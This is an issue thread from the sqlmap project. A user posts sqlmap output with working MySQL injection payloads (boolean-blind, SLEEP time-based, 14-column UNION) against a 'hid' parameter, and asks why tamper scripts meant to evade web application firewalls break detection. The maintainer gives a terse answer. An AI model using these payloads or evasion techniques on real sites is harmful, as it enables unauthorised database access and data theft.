### ISSUE TITLE
sqlmap fail to detect injection when using tamper scripts

### ISSUE THREAD

**Issue by serptt** [sqlmapproject/sqlmap#3462]
So I have a vulnerable website with following injections:
---
Parameter: hid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hid=0' AND 6149=6149 AND 'lcLp'='lcLp
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: hid=0' AND SLEEP(5) AND 'pfjs'='pfjs
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: MySQL UNION query (82) - 14 columns
    Payload: hid=-2501' UNION ALL SELECT 82,82,82,82,82,82,82,82,82,82,82,82,CONCAT(0x71706a6a71,0x6b6757466d486a576d714f68454264725a5053474f43655348666953776462476b48556c6b6a6b64,0x71627a6b71),82#
    Vector:  UNION ALL SELECT 82,82,82,82,82,82,82,82,82,82,82,82,[QUERY],82#
---

I was able to dump the database so there is no false positive.

Issue arise when I am trying to use tamper scripts to cheat the waf. This website has no waf but I wanted to test tamper scripts.

SO using the following tamper scripts alone : overlongutf8 / overlongutf8more / charunicodeencode / charunicodeescape / chardoubleencode / randomcomments ( and maybe more) SQLMAP fails to detect any injection point above.

The database in MySQL.

What am I doing wrong? How can I evade firewalls if tamper scripts change the detection results?

Thanks!

**Comment by stamparm** [comment]
You can't use random tamper scripts around. Not sure what to comment else
